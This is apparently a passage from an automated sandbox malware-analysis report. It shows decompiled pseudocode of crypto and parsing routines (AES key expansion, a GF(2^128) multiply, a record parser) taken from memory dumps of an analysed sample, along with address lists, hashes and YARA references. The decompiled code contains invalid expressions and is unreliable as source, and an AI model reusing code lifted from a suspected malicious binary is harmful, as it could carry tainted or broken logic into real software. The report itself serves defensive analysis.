								_t97 = 0;
								_v28 = 0x80000000;
							}
							_t110 = _t112 | _v28;
							_t124 = _t127 | _t97;
							_t83 = (_t101 << 0x00000020 | _v8) >> 0x1 ^ 0x00000000;
							_t101 = _t101 >> 0x00000001 ^ 0xe1000000;
						}
						_t106 = (_t106 << 0x00000020 | _t118) << 1;
						_v8 = _t83;
						_t118 = _t118 + _t118;
						_t68 =  &_v32;
						 *_t68 = _v32 - 1;
					} while ( *_t68 != 0);
					_t105 = _v36 + 1;
					_v36 = _t105;
				} while (_t105 < 2);
				_t108 = _v44;
				_t93 = _v12;
				_t108[1] = _v16;
				_t108[2] = _v20;
				_t108[3] = _v24;
				 *_t108 = _t93;
				return _t93;
			}

0x105b3dcb
0x105b3dcf
0x105b3dd3
0x105b3dd7
0x105b3ddf
0x105b3de5
0x105b3dea
0x105b3df0
0x105b3df3
0x105b3df6
0x105b3df9
0x105b3dfb
0x105b3e01
0x105b3e04
0x105b3e07
0x105b3e0a
0x105b3e0a
0x105b3e0d
0x105b3e14
0x105b3e1b
0x105b3e1e
0x105b3e21
0x105b3e24
0x105b3e24
0x105b3e26
0x105b3e2e
0x105b3e31
0x105b3e34
0x105b3e37
0x105b3e37
0x105b3e42
0x105b3e45
0x105b3e8a
0x105b3e91
0x105b3e96
0x105b3ea3
0x105b3ea6
0x105b3eae
0x105b3eb1
0x105b3e98
0x105b3e98
0x105b3e9a
0x105b3e9a
0x105b3eb4
0x105b3eb7
0x105b3ebc
0x105b3ec0
0x105b3e47
0x105b3e47
0x105b3e4e
0x105b3e53
0x105b3e60
0x105b3e63
0x105b3e6b
0x105b3e6e
0x105b3e55
0x105b3e55
0x105b3e57
0x105b3e57
0x105b3e71
0x105b3e74
0x105b3e7f
0x105b3e82
0x105b3e82
0x105b3ec2
0x105b3ec6
0x105b3ec9
0x105b3ecb
0x105b3ecb
0x105b3ecb
0x105b3ed8
0x105b3ed9
0x105b3edc
0x105b3ee5
0x105b3eeb
0x105b3eee
0x105b3ef4
0x105b3efa
0x105b3eff
0x105b3f05

Strings

@, xrefs: 105B3E0D

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction ID: 965cf78d2f1780ae571ed71020487231a0bdc7c6eab5c2f1560311203763fc5c
Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
Instruction Fuzzy Hash: 2641E676D102199BCB44CFA9C98179DFBF6FF88310F25815AE905B3351D375A9828B90

Uniqueness

Uniqueness Score: -1.00%

Function 004516E0, Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
Instruction ID: 2cb720bef2544e5c06a33a5d17755d7e86d39b9e029a2e5d8d400cd4f85def03
Opcode Fuzzy Hash: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
Instruction Fuzzy Hash: C832F122D29F014DD723A634C832336A249AFB33C6F55C737EC1AB5AB6EB2984C74145

Uniqueness

Uniqueness Score: -1.00%

Function 0044BCC9, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b641f070c2405a49e1eadb6568e9d2778ebd8eecacbe3dbd9c7f7c2cfa08f05a
Instruction ID: a3281e84da692e2451ecee3bc7ad76d72f52b4e124b9255ecb7e44b2b6ef82ce
Opcode Fuzzy Hash: b641f070c2405a49e1eadb6568e9d2778ebd8eecacbe3dbd9c7f7c2cfa08f05a
Instruction Fuzzy Hash: 16324621D29F014DE7639634C972336A248AFB73C5F19C737F81AB5EA6EB29C4834109

Uniqueness

Uniqueness Score: -1.00%

Function 105AB90E, Relevance: .6, Instructions: 585
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E105AB90E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed char _v7;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v34;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				void _v72;
				void* __edi;
				void* _t251;
				void _t254;
				signed char _t272;
				void* _t274;
				intOrPtr _t275;
				intOrPtr* _t280;
				void* _t281;
				void* _t285;
				intOrPtr _t292;
				void* _t318;
				signed short _t321;
				intOrPtr _t326;
				void* _t338;
				void* _t350;
				void* _t362;
				signed char _t370;
				signed int _t371;
				intOrPtr _t374;
				intOrPtr* _t375;
				signed int _t377;
				intOrPtr _t379;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t395;
				signed int _t436;
				signed int _t438;
				signed char _t442;
				intOrPtr _t445;
				signed int _t447;
				void* _t448;
				signed char _t449;
				void* _t454;
				intOrPtr _t475;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr* _t482;
				intOrPtr _t483;
				intOrPtr _t484;
				intOrPtr _t485;
				signed int _t486;
				intOrPtr _t488;
				signed int _t489;
				void* _t490;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t497;

				_t375 = __ecx;
				_v12 = __edx;
				_t377 = 0xa;
				_t442 =  *(__ecx + 0x308) & 0x0000ffff;
				_t486 = 0;
				_t251 = memset( &_v72, 0, _t377 << 2);
				_t491 = _t490 + 0xc;
				 *(_t375 + 0x318) = _t251;
				_v28 = _t251;
				_v24 = _t251;
				_t480 =  *_a4;
				_v60 = _t480;
				_t379 = _t480;
				_v56 = _t379;
				if(_t442 < 0x8000) {
					L9:
					_push(0x48);
					_t254 = E105BEB10();
					_v72 = _t254;
					if(_t254 == 0) {
						L8:
						_t486 = 0xffffff83;
						L120:
						E105AB7AB( &_v72);
						E105AABE0(_t375);
						return _t486;
					}
					E105C2D6E(_t480, _t254, 0, 0x48);
					_t492 = _t491 + 0xc;
					if(_t480 - _v56 + 3 > _a8) {
						L2:
						_t486 = 0xfffffeb8;
						goto L120;
					}
					E105A9ECA(_t480 + _v12,  &_v20);
					_t384 = _v20;
					_t481 = _t480 + 3;
					_v60 = _t481;
					_v16 = _t384;
					if(_t384 > 0x481e) {
						goto L2;
					}
					_t445 = _v56;
					if(_t384 - _t445 + _t481 != _a8) {
						goto L2;
					}
					_t385 = _v52;
					if(_t384 == 0) {
						L24:
						_v44 = _v44 & 0x00000000;
						_v48 = _t385;
						if(_t385 != 0) {
							L30:
							_v34 = _v34 & 0x0000fffb;
							_t482 = E105BEB10();
							_v64 = _t482;
							if(_t482 == 0) {
								goto L8;
							}
							E105C2D6E(_t482, _t482, 0, 0x370);
							_t387 = _v52;
							_t447 = 1;
							_t493 = _t492 + 0xc;
							 *(_t375 + 0x318) = 1;
							if(_t387 <= 0 || _t387 <= 1) {
								L50:
								if(_t486 != 0) {
									goto L120;
								}
								 *(_t375 + 0x318) = 2;
								if(_v48 <= _t486) {
									_t448 = 0;
									L64:
									_t449 = _t448 + 1;
									L65:
									_t389 = _v34 & _t449;
									_v24 = _t389;
									if(_t389 == 0 || _t486 == 0) {
										 *(_t375 + 0x318) = 3;
										if(_v48 <= 0) {
											L103:
											if(_v24 == 0 || _t486 == 0) {
												 *(_t375 + 0x318) = 4;
												if(_v40 != 0) {
													_t486 =  ==  ? _v40 : _t486;
												}
												_t486 = E105AB65C( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t486,  &_v72);
												_t272 =  *(_t375 + 0x308) & 0x0000ffff;
												_t395 = _t272 & 0x00000080;
												if(_t395 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
													 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
													_t486 = 0;
												}
												if(_t486 == 0) {
													if((_t272 & 0x00000030) == 0x10) {
														 *((char*)(_t375 + 0x311)) = 5;
													}
												} else {
													if(_t395 == 0) {
														E105AB5FD(_t375, _t486);
													}
													 *(_t375 + 0x1f0) = _t486;
												}
												_t274 = E105A9F46(_t375);
												_t275 = _v60;
												if(_t274 != 0) {
													_t275 = _t275 +  *((intOrPtr*)(_t375 + 0x300));
													_v60 = _t275;
												}
												 *(_t375 + 0x318) = 5;
												 *_a4 = _t275;
											}
											goto L120;
										}
										if( *(_t482 + 0x36c) >= 0x80) {
											if( *((intOrPtr*)(_t375 + 0x227)) == _t449 && ( *(_t375 + 0x308) & 0x00000030) == 0x10) {
												_t486 =  ==  ? 0xfffffe7f : _t486;
											}
											_t292 =  *((intOrPtr*)(_t375 + 0x228));
											if(_t292 == _t449 || _t292 == 3 &&  *((char*)(_t375 + 0x22b)) == 0) {
												_t486 =  ==  ? 0xfffffe81 : _t486;
											}
										}
										if(( *(_t482 + 0x36d) & _t449) != 0) {
											if(( *(_t375 + 0x308) & 0x00000030) != 0x10) {
												_t486 =  ==  ? 0xfffffe7e : _t486;
											} else {
												if(( *(_t482 + 0x31c) & 0x00000003) == 0) {
													_t486 = 0xfffffe7e;
												}
											}
										}
										if(_t389 == 0) {
											 *(_t375 + 0x30a) =  *(_t375 + 0x30a) | 0x00002000;
											if(( *(_t375 + 0x308) & 0x00000080) == 0) {
												_t286 =  *((intOrPtr*)(_t375 + 0xf8));
												if( *((intOrPtr*)(_t375 + 0xf8)) != 0) {
													if( *((intOrPtr*)(_t482 + 0x24)) == 0) {
														E105AB4FB( *((intOrPtr*)(_t482 + 0x7c)), _t286);
														_t486 =  ==  ? 0xfffffebe : _t486;
													} else {
														_push(_t389);
														if(E105AB5A3(_t286) != 1) {
															_t486 = 0xfffffebe;
														}
													}
												}
											}
											if( *((intOrPtr*)(_t482 + 0x1c)) != 0x206) {
												goto L103;
											} else {
												_v28 = _v28 & 0x00000000;
												_t280 = _t375 + 0x37c;
												_t399 =  *_t280;
												if( *_t280 != 0) {
													if( *((char*)(_t375 + 0x382)) == 0) {
														L96:
														_t281 = E105B7899( *_t482,  &_v28,  *_t280,  *((intOrPtr*)(_t482 + 4)));
														if(_t281 != 0) {
															L98:
															_t486 = 0xfffffeaa;
															L99:
															if(_t486 == 0 &&  *((char*)(_t375 + 0x382)) != 0 && ( *(_t375 + 0x308) & 0x00000080) == 0) {
																E105BAE22( *((intOrPtr*)(_t375 + 0x37c)));
																_t486 =  <  ? 0xfffffe66 : _t486;
															}
															goto L103;
														}
														 *((char*)(_t375 + 0x382)) = _t281 + 1;
														goto L99;
													}
													_t285 = E105AABBF(_t375, _t399);
													 *((char*)(_t375 + 0x382)) = 0;
													L94:
													if(_t285 != 0) {
														goto L98;
													}
													_t280 = _t375 + 0x37c;
													goto L96;
												}
												_push(_t280);
												_t454 = 0x25;
												_t285 = E105AAB2E(_t454);
												goto L94;
											}
										} else {
											 *(_t375 + 0x1f0) = _t486;
											goto L120;
										}
									} else {
										goto L120;
									}
								}
								_v44 = _v44 & _t486;
								_t486 = E105AB7F9(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
								if(_t486 != 0) {
									if(_t486 == 0xffffff74 || _t486 == 0xffffff7c) {
										_t482 = _v64;
										_t449 = 1;
										_v34 = _v34 | 1;
									} else {
										_t482 = _v64;
										_t449 = 1;
										if( *((intOrPtr*)(_t375 + 0x80)) == 0) {
											_v34 = _v34 | 1;
										} else {
											_v34 = _v34 ^ (_v34 >> 0x00000001 ^ _v34) & 1;
										}
									}
									goto L65;
								}
								_t482 = _v64;
								_t448 = 0;
								if((_v34 & 0x00000002) == 0) {
									_v34 = _v34 & 0x0000fffe;
									goto L64;
								} else {
									_t486 = _v40;
									_t449 = 1;
									_v34 = _v34 | 1;
									goto L65;
								}
							} else {
								do {
									_v44 = _v48 - 1;
									_t318 = E105AB7F9(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
									_t493 = _t493 + 0x10;
									if(_t318 == 0) {
										_t318 = E105AB8D6(_t375,  &_v72);
									}
									_t486 = E105AB65C( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t318,  &_v72);
									_t321 =  *(_t375 + 0x308) & 0x00000080;
									if(_t321 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
										 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
										_t486 = 0;
									}
									_t482 = _v64;
									if(_t486 != 0) {
										L45:
										if(( *(_t375 + 0x308) & 0x00000080) == 0) {
											E105AB5FD(_t375, _t486);
										}
										 *(_t375 + 0x1f0) = _t486;
										if(_v40 == 0) {
											_v40 = _t486;
											_t486 = 0;
										}
										goto L49;
									}
									if(( *(_t482 + 0x36c) & 0x00000010) != 0 && _t321 == 0 && _v24 == 0) {
										_v20 = _v20 & 0x00000000;
										_t486 = E105B750E( &_v20,  *((intOrPtr*)(_v72 + 4 + _v44 * 8)), 5,  *((intOrPtr*)(_t375 + 0x84)));
										if(_t486 < 0) {
											goto L120;
										}
										E105C334E( *_v20,  *((intOrPtr*)(_v72 + _v44 * 8)),  *((intOrPtr*)(_v72 + 4 + _v44 * 8)));
										_t493 = _t493 + 0xc;
										_t486 =  ==  ? 0 : E105AD9B1( *((intOrPtr*)( *_t375 + 0x50)),  &_v20, 2, 0);
										if(_t486 == 0) {
											goto L49;
										}
										goto L45;
									}
									L49:
									_t387 = _t482;
									E105B50C9(_t482);
									_v34 = _v34 & 0x0000fffb;
									_t447 = 1;
									_t326 = _v48 - 1;
									_v48 = _t326;
								} while (_t326 > 1);
								goto L50;
							}
						}
						if(( *(_t375 + 0x30c) & 0x00002000) != 0) {
							L28:
							if(( *(_t375 + 0x308) & 0x00000030) == 0) {
								_t486 = 0xfffffea7;
								E105AB5FD(_t375, 0xfffffea7);
							}
							goto L30;
						}
						if(( *(_t375 + 0x308) & 0x00000100) == 0) {
							goto L30;
						}
						_t338 = E105A9F2A( *(_t375 + 0x218) & 0x0000ffff);
						_t492 = _t492 + 4;
						if(_t338 == 0) {
							goto L30;
						}
						goto L28;
					}
					L14:
					L14:
					if(_t385 >= ( *(_t375 + 0x20e) & 0x000000ff) || _t385 >= 9) {
						_t486 = 0xfffffe90;
					} else {
						goto L16;
					}
					goto L120;
					L16:
					if(_t481 - _t445 + 3 > _a8) {
						goto L2;
					}
					E105A9ECA(_t481 + _v12,  &_v20);
					_t483 = _t481 + 3;
					_v60 = _t483;
					if(_v20 - _v56 + _t483 > _a8) {
						goto L2;
					}
					_t436 = _v52;
					 *((intOrPtr*)(_v72 + 4 + _t436 * 8)) = _v20;
					_t481 = _t483 + _v20;
					_v60 = _t481;
					 *((intOrPtr*)(_v72 + _t436 * 8)) = _v12 + _t483;
					_t445 = _v56;
					_t350 = 0xfffffffd;
					_v16 = _v16 + _t350 - _v20;
					if( *(_t375 + 0x308) < 0x8000) {
						L23:
						_t385 = _t436 + 1;
						_v52 = _t385;
						if(_v16 != 0) {
							goto L14;
						}
						goto L24;
					}
					if(_t481 - _t445 + 2 > _a8) {
						goto L2;
					}
					_t488 = _v12;
					E105A9EE4(_t481 + _t488,  &_v8);
					_t484 = _t481 + 2;
					_v60 = _t484;
					if((_v8 & 0x0000ffff) - _v56 + _t484 > _a8) {
						goto L2;
					}
					_t438 = _v52;
					_t475 = _v68;
					 *(_t475 + 4 + _t438 * 8) = _v8 & 0x0000ffff;
					_t489 = _v8 & 0x0000ffff;
					 *((intOrPtr*)(_t475 + _t438 * 8)) = _t484 + _t488;
					_t481 = _t484 + _t489;
					_t362 = 0xfffffffe;
					_v60 = _t481;
					_v16 = _v16 + _t362 - _t489;
					_t486 = E105B0461(_t375,  *((intOrPtr*)(_t475 + _t438 * 8)), _t497,  *(_t475 + 4 + _t438 * 8) & 0x0000ffff, 0xb, 0);
					_t492 = _t492 + 0xc;
					if(_t486 < 0) {
						goto L120;
					} else {
						_t436 = _v52;
						_t445 = _v56;
						goto L23;
					}
				}
				if(_t480 - _t379 + 1 <= _a8) {
					_t370 =  *((intOrPtr*)(_t480 + _v12));
					_t485 = _t480 + 1;
					_v7 = _t370;
					_t371 = _t370 & 0x000000ff;
					_v20 = _t371;
					_v60 = _t485;
					if(_t371 - _t379 + _t485 > _a8) {
						goto L2;
					}
					if((_t442 & 0x00000030) != 0x10 || _v7 == 0) {
						_t480 = _t485 + _v20;
						_push(0x48);
						_v60 = _t480;
						_t374 = E105BEB10();
						_v68 = _t374;
						if(_t374 != 0) {
							goto L9;
						}
						goto L8;
					} else {
						_t486 = 0xfffffe5c;
						goto L120;
					}
				}
				goto L2;
			}

0x105ab917
0x105ab919
0x105ab923
0x105ab924
0x105ab92b
0x105ab92d
0x105ab92d
0x105ab92f
0x105ab935
0x105ab938
0x105ab93e
0x105ab945
0x105ab948
0x105ab94a
0x105ab950
0x105ab9b7
0x105ab9b7
0x105ab9ba
0x105ab9bf
0x105ab9c4
0x105ab9af
0x105ab9b1
0x105ac050
0x105ac053
0x105ac05a
0x105ac067
0x105ac067
0x105ab9cb
0x105ab9d2
0x105ab9de
0x105ab95c
0x105ab95c
0x00000000
0x105ab95c
0x105ab9ed
0x105ab9f2
0x105ab9f5
0x105ab9f8
0x105ab9fb
0x105aba04
0x00000000
0x00000000
0x105aba0a
0x105aba16
0x00000000
0x00000000
0x105aba1e
0x105aba21
0x105abb40
0x105abb40
0x105abb49
0x105abb4e
0x105abb92
0x105abb9c
0x105abba5
0x105abba7
0x105abbac
0x00000000
0x00000000
0x105abbba
0x105abbbf
0x105abbc4
0x105abbc5
0x105abbc8
0x105abbd0
0x105abd32
0x105abd34
0x00000000
0x00000000
0x105abd3a
0x105abd44
0x105abde3
0x105abde5
0x105abde5
0x105abde6
0x105abde9
0x105abdeb
0x105abdee
0x105abdfc
0x105abe03
0x105abfa5
0x105abfaa
0x105abfb8
0x105abfbf
0x105abfc3
0x105abfc3
0x105abfd9
0x105abfdb
0x105abfe5
0x105abfeb
0x105abffd
0x105ac004
0x105ac004
0x105ac008
0x105ac024
0x105ac026
0x105ac026
0x105ac00a
0x105ac00d
0x105ac013
0x105ac013
0x105ac018
0x105ac018
0x105ac02f
0x105ac036
0x105ac039
0x105ac03b
0x105ac041
0x105ac041
0x105ac047
0x105ac04e
0x105ac04e
0x00000000
0x105abfaa
0x105abe14
0x105abe1c
0x105abe36
0x105abe36
0x105abe39
0x105abe41
0x105abe60
0x105abe60
0x105abe41
0x105abe69
0x105abe75
0x105abe93
0x105abe77
0x105abe7e
0x105abe80
0x105abe80
0x105abe7e
0x105abe75
0x105abe99
0x105abeab
0x105abebd
0x105abebf
0x105abec7
0x105abecd
0x105abeef
0x105abefc
0x105abecf
0x105abecf
0x105abedf
0x105abee1
0x105abee1
0x105abedf
0x105abecd
0x105abec7
0x105abf06
0x00000000
0x105abf0c
0x105abf0c
0x105abf10
0x105abf16
0x105abf1a
0x105abf30
0x105abf4c
0x105abf56
0x105abf5f
0x105abf6a
0x105abf6a
0x105abf6f
0x105abf71
0x105abf8f
0x105abfa2
0x105abfa2
0x00000000
0x105abf71
0x105abf62
0x00000000
0x105abf62
0x105abf35
0x105abf3a
0x105abf41
0x105abf44
0x00000000
0x00000000
0x105abf46
0x00000000
0x105abf46
0x105abf1c
0x105abf1f
0x105abf22
0x00000000
0x105abf22
0x105abe9b
0x105abe9b
0x00000000
0x105abe9b
0x00000000
0x00000000
0x00000000
0x105abdee
0x105abd4a
0x105abd6f
0x105abd76
0x105abda8
0x105abdd7
0x105abddc
0x105abddd
0x105abdb2
0x105abdb2
0x105abdb7
0x105abdbf
0x105abdd1
0x105abdc1
0x105abdcb
0x105abdcb
0x105abdbf
0x00000000
0x105abda8
0x105abd78
0x105abd7b
0x105abd81
0x105abd9c
0x00000000
0x105abd83
0x105abd83
0x105abd86
0x105abd87
0x00000000
0x105abd87
0x105abbde
0x105abbde
0x105abbe2
0x105abc02
0x105abc07
0x105abc0c
0x105abc13
0x105abc13
0x105abc2b
0x105abc39
0x105abc3c
0x105abc4e
0x105abc55
0x105abc55
0x105abc57
0x105abc5c
0x105abce9
0x105abcf4
0x105abcfa
0x105abcfa
0x105abd03
0x105abd09
0x105abd0b
0x105abd0e
0x105abd0e
0x00000000
0x105abd09
0x105abc69
0x105abc91
0x105abca0
0x105abca6
0x00000000
0x00000000
0x105abcbe
0x105abcc8
0x105abce1
0x105abce7
0x00000000
0x00000000
0x00000000
0x105abce7
0x105abd10
0x105abd10
0x105abd12
0x105abd1e
0x105abd22
0x105abd26
0x105abd27
0x105abd2a
0x00000000
0x105abbde
0x105abbd0
0x105abb57
0x105abb7b
0x105abb82
0x105abb84
0x105abb8d
0x105abb8d
0x00000000
0x105abb82
0x105abb65
0x00000000
0x00000000
0x105abb6f
0x105abb74
0x105abb79
0x00000000
0x00000000
0x00000000
0x105abb79
0x00000000
0x105aba27
0x105aba30
0x105abd8d
0x00000000
0x00000000
0x00000000
0x00000000
0x105aba3f
0x105aba49
0x00000000
0x00000000
0x105aba58
0x105aba60
0x105aba68
0x105aba6e
0x00000000
0x00000000
0x105aba74
0x105aba7f
0x105aba8b
0x105aba8e
0x105aba91
0x105aba94
0x105aba97
0x105aba9b
0x105abaaa
0x105abb32
0x105abb32
0x105abb37
0x105abb3a
0x00000000
0x00000000
0x00000000
0x105abb3a
0x105ababa
0x00000000
0x00000000
0x105abac0
0x105abac9
0x105abad2
0x105abada
0x105abae0
0x00000000
0x00000000
0x105abae6
0x105abae9
0x105abaf2
0x105abaf9
0x105abafd
0x105abb00
0x105abb02
0x105abb05
0x105abb08
0x105abb1f
0x105abb21
0x105abb26
0x00000000
0x105abb2c
0x105abb2c
0x105abb2f
0x00000000
0x105abb2f
0x105abb26
0x105ab95a
0x105ab969
0x105ab96c
0x105ab96d
0x105ab970
0x105ab973
0x105ab97a
0x105ab980
0x00000000
0x00000000
0x105ab988
0x105ab99a
0x105ab99d
0x105ab9a0
0x105ab9a3
0x105ab9a8
0x105ab9ad
0x00000000
0x00000000
0x00000000
0x105ab990
0x105ab990
0x00000000
0x105ab990
0x105ab988
0x00000000

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4011f54b20b6d99306f17f811412d5ffe036df645d5cd64277433858df453dba
Instruction ID: 2b88e946ad14904156fa2bb41125767ac42fe93937e5122c92d3d3661b30d9ea
Opcode Fuzzy Hash: 4011f54b20b6d99306f17f811412d5ffe036df645d5cd64277433858df453dba
Instruction Fuzzy Hash: 5F22D271A0025ADBEF05CF68C8907EEBBB5EF84350F154969EC55AB286DB309E41CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAA0, Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6738b7a1d861f86abd809277f986c405beb7f99ca6919811340b7ef6a53347
Instruction ID: 49bedcb936ec6ce3924db17fa1c14752e1e0bec2c1eaa22c03ee826eb31dc35c
Opcode Fuzzy Hash: df6738b7a1d861f86abd809277f986c405beb7f99ca6919811340b7ef6a53347
Instruction Fuzzy Hash: F022F371A012199BDF15CF68C8907EEB7B1EF44314F18416BEC55AB382DB389E81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 105B3725, Relevance: .4, Instructions: 411
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E105B3725(signed int* __ecx, void* __edx, unsigned int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int* _v8;
				signed int _t250;
				signed int _t267;
				void* _t270;
				intOrPtr _t314;
				signed int _t330;
				signed int _t351;
				signed int _t369;
				signed int _t387;
				signed int _t406;
				signed int _t413;
				signed char* _t414;
				signed int _t425;
				signed int _t427;
				signed int _t431;
				intOrPtr _t455;
				signed int _t459;
				signed int _t461;
				signed int _t464;
				signed int _t467;
				signed int _t469;
				signed int _t470;
				signed int _t473;
				signed int _t476;
				signed int _t482;
				intOrPtr* _t493;
				signed int _t500;
				signed int _t506;
				signed int _t513;
				signed int _t519;
				signed int _t525;
				unsigned int _t527;
				signed int* _t528;
				void* _t530;
				intOrPtr* _t532;
				signed int* _t534;
				signed int* _t535;
				signed int* _t537;
				void* _t538;
				intOrPtr _t539;
				void* _t541;
				void* _t542;
				void* _t543;

				_push(__ecx);
				_t527 = _a4;
				_t537 = __ecx;
				_v8 = __ecx;
				 *(__ecx + 0xf4) = _t527;
				 *((intOrPtr*)(__ecx + 0xf0)) = (_t527 >> 2) + 6;
				E105C334E(__ecx, __edx, _t527);
				E105B311D(_t537, _t537, _t527);
				if(_t527 == 0x10) {
					_t476 = _t537[3];
					_t528 =  &(_t537[1]);
					_t425 = ( *(0x462118 + (_t476 >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461d18 + (_t476 >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t476 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t476 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
					_t537[4] = _t425;
					_t250 =  *_t528 ^ _t425;
					_t427 = _t537[2] ^ _t250;
					_t537[5] = _t250;
					_t537[6] = _t427;
					_t537[7] = _t427 ^ _t476;
					_t538 = 4;
					do {
						_t528 =  &(_t528[4]);
						_t429 = _t528[2];
						_t122 = _t538 + 0x4608f0; // 0x2000000
						_t538 = _t538 + 4;
						_t482 =  *(0x461d18 + (_t528[2] >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t528[2] >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x461918 + (_t429 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t122 ^  *(_t528 - 4);
						_t528[3] = _t482;
						_t267 =  *_t528 ^ _t482;
						_t528[4] = _t267;
						_t431 = _t528[1] ^ _t267;
						_t528[5] = _t431;
						_t528[6] = _t528[2] ^ _t431;
					} while (_t538 != 0x28);
					goto L12;
				} else {
					if(_t527 == 0x18) {
						_t457 = _t537[5];
						_t534 =  &(_t537[0xa]);
						_t500 = ( *(0x462118 + (_t537[5] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461d18 + (_t457 >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t457 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t457 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
						_t330 = _t537[1] ^ _t500;
						_t537[6] = _t500;
						_t537[7] = _t330;
						_t459 = _t537[2] ^ _t330;
						_t537[8] = _t459;
						_t537[9] = _t537[3] ^ _t459;
						_t542 = 4;
						do {
							_t461 =  *(_t534 - 0x18) ^  *(_t534 - 4);
							 *_t534 = _t461;
							_t534[1] =  *(_t534 - 0x14) ^ _t461;
							_t534 =  &(_t534[6]);
							_t462 =  *(_t534 - 0x14);
							_t88 = _t542 + 0x4608f0; // 0x2000000
							_t542 = _t542 + 4;
							_t506 =  *(0x461d18 + ( *(_t534 - 0x14) >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + ( *(_t534 - 0x14) >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x462118 + (_t462 >> 0x00000010 & 0x000000ff) * 4) & 0xff000000 ^  *(0x461918 + (_t462 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t88 ^  *(_t534 - 0x28);
							 *(_t534 - 0x10) = _t506;
							_t351 =  *(_t534 - 0x24) ^ _t506;
							 *(_t534 - 0xc) = _t351;
							_t464 =  *(_t534 - 0x20) ^ _t351;
							 *(_t534 - 8) = _t464;
							 *(_t534 - 4) =  *(_t534 - 0x1c) ^ _t464;
						} while (_t542 != 0x20);
						goto L12;
					} else {
						if(_t527 == 0x20) {
							_t465 = _t537[7];
							_t535 =  &(_t537[0xc]);
							_t513 = ( *(0x462118 + (_t537[7] >> 0x00000010 & 0x000000ff) * 4) ^ 0x01000000) & 0xff000000 ^  *(0x461d18 + (_t465 >> 0x18) * 4) & 0x000000ff ^  *(0x462518 + (_t465 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x461918 + (_t465 & 0x000000ff) * 4) & 0x0000ff00 ^  *_t537;
							_t369 = _t537[1] ^ _t513;
							_t537[8] = _t513;
							_t537[9] = _t369;
							_t467 = _t537[2] ^ _t369;
							_t537[0xa] = _t467;
							_t537[0xb] = _t537[3] ^ _t467;
							_t543 = 4;
							do {
								_t468 =  *(_t535 - 4);
								_t469 =  *(_t535 - 0x18);
